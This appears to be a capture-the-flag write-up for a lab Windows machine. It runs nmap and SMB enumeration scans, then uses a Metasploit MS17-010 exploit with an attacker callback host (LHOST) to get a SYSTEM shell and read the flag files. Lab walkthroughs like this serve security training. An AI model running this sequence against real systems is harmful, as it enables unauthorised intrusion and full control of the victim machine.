Ping
ping 10.10.10.40
Nmap default Scan
nmap 10.10.10.40 -oN dnmap
Script and Service Scan
nmap 10.10.10.40 -sC -sV -oN snmap
All port Scan
nmap 10.10.10.40 -sC -sV -p- -T5 --open -oN anmap
No new Ports found, same as script and Service scan
Smb Script Scan
nmap --script smb-vuln* --script smb-enum-users.nse 10.10.10.40
It is Vulnerable as Expected.
Smb Enumeration
smbclient -U '' -L \\\\10.10.10.40\\
We got some interesting share, lets enumerate.
smbclient -N //10.10.10.40/share
no useful files in ‘share’, will try with ‘users’
smbclient -N //10.10.10.40/users
This looks interesting, lets enumerate further.
All the files from the below screenshots are got from the smb share Users
Can’t find any useful Information after analysing the files I got from the SMB Shares.
Will jump back to the Vulnerability we found for SMB.
Will use Metasploit
Will Search for exploits
search ms17-010
use 2
Will set LHOST, RHOST
set LHOST 10.10.14.61
set RHOST 10.10.10.40
exploit
We got Shell
shell
whoami
We landed as a nt/authority, so no need Privilege escalation.
Got user.txt in user haris Desktop
type user.txt
ipconfig
Got Root flag in Administrator Desktop
type root.txt
ipconfig
We are done with BLUEEEEEEEE…:)